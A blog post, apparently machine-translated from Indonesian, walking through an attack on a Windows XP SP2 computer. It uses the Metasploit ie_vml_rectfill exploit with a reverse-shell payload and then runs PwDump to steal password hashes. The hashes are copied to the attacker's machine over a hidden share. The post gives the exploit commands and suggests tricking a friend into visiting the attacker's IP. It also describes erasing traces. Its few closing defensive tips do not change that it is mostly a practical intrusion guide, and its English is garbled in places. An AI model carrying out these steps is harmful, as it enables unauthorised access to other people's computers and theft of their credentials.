After learning some basic concepts and 'standard' of the hack dibagian discussed first, and know a little about the exploits of the material on the second part, we wrote a direct-current practice. Here I am deliberately using VMWare to simulate, because not everyone can be practiced in a network. By using VMware,
we can simulate a simple network as if there is a network consisting of our own computer and other computers. For those who can not use VMWare, try searching the internet! Operating System I use is Windows XP SP2.
Tools that I use is the Metasploit Framework to do exploits and PwDump6 to take a hash file from the target computer. What is Metasploit Framework?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
For more information about the use of Metasploit, you can read the documentation are also included in the installation. Metasploit to install version 2.7, users needed administrator. Earlier I tried to install a 'limited user' but once installed can not run. Actually this metasploit installation extracts the files only. So you can install it without having to get the user admin and put it anywhere without having to install in the Program Files folder. But after a little dioprek, it does not have to admin that can run. Rather ribet and males are also still writing here, because when I try the latest version, the version 3 Beta 3, we can run it without having to install the admin user. Gitu aja ko repot! Moreover, version 3 (skarang msh beta) is more sophisticated and more features. But unfortunately for msfweb (web version) can not be fully implemented.
Ok .. now I Assume you have read the userguide metasploit (ah.. at least my assumption is wrong; p). More plasticity Let cool and understand the details, I explained that using the console metasplooit (mfsconsole) only. Metasploit using cygwin to run it, because metasploit created using Perl. Now let's practice!
Pertama2 run 'mfsconsole'!
main1.JPG
To learn what the command is in MSFConsole use the command 'help'.
Because the computer you want to target is Windows XP SP2, then used exploits affecting XP SP2 is by Exploiting weaknesses in Internet Explorer vml Fill Method Code Execution.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the vml processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
To see the info from these exploits use the command:
msf> info ie_vml_rectfill
Exploit weaknesses in ie_vml_rectfill use Internet Explorer. Therefore, this exploit will have an effect if the target computer running IE and its direct url to the computer attackers. For that, we must use a little 'social engineering', as if in a boarding / lab / office we say to our friends that we're trying to create new web applications, and for help viewed using IE to an IP address (or computer name) us. Http://192.168.186.1 suppose. Usually after this exploit is run and the target computer has been connected, then IE will crash. Take a few moments to let the exploit 'works'. After a few moments to say wrote "well .. ya no errors. Ok deh .. My first try ... thanks betulin yes". New cover his pake IE Task Manager (TM pake although, IE msh hard to kill, do not forget to'end process' a 'dumpred.exe' too, but after the exploit works:-D).
To use the following exploits perintah2 use in the console:
msf> use_ie_vml_rectfill
msf> set payload win32_reverse
msf> set RHOST ip_target
msf> set LHOST ip_penyerang
msf> exploit
The result will look like the following picture:
exploit1.JPG
In the example above, the target computer's IP (RHOST) is 192,168,186,128, and attackers computer (LHOST) is 192.168.186.1. Then 'payload' is used is 'win32_reverse' and the HTTP port is 80 (default http port). After running the command 'exploit', then we ask the target computer to run IE and directs them to the url of our computers. This process will take some time, even sometimes not successful. So try to keep aja:-D
If you succeed, then you will get a 'cmd.exe' from the target computer.
Crack da Password!
Well, after we 'control' the target computer, we see skalian wrote his password. Way similar to my previous article about Win XP SP2 Hack Password, but because it is remote, we must 'provide' the requisite PwDump programs. In order for this method successfully, I Assume on the target computer users who are logged in have admin access. Klo users who use the target computer that was used IE user only 'normal', pwdump will not work!
First we used to share PwDump from our computers with full access so that we can upload the dump target computer passwords, but with the suffix '$' let me not see a public computer. Suppose the name of the folder in the share PwDump $. Then from the console to succeed dihack, take PwDump the Map Network Drive from your computer with 'net use'. Examples of commands used:
pwdump.JPG
After that copy Pwdump to the target computer in the temporary folder, 'temp'. After successfully Pwdump be copied to the target computer, run the command Pwdump
C: \ temp \ Pwdump-o pass.txt 127.0.0.1
Klo successfully will appear in the following figure.
dump1.JPG
Then copy the file to your computer pass.txt us
C: \ temp \ copy pass.txt z:
And finally, do not leave a trace that we had stopped over there.
clean.JPG
Well, udah dapet a hash of his files. Living in crack aja deh .... (read the previous article for nge-crack passwords).
Actually there are many who can dioprek from metasploit. In many metasploit exploit, payload, meterpreter, etc. very 'nice' for dioprek. To learn metasploit, there disitusnya pretty good documentation.
Happy Hacking ... ..
Some suggestions for how we stay safe windows to exploit the above.
1. Do not use Internet Explorer. Use Mozilla Firefox or Opera!.
2. Patch your Windows.
3. Use antivirus with latest update
4. Be careful of your own friends ..
0 comments:
Post a Comment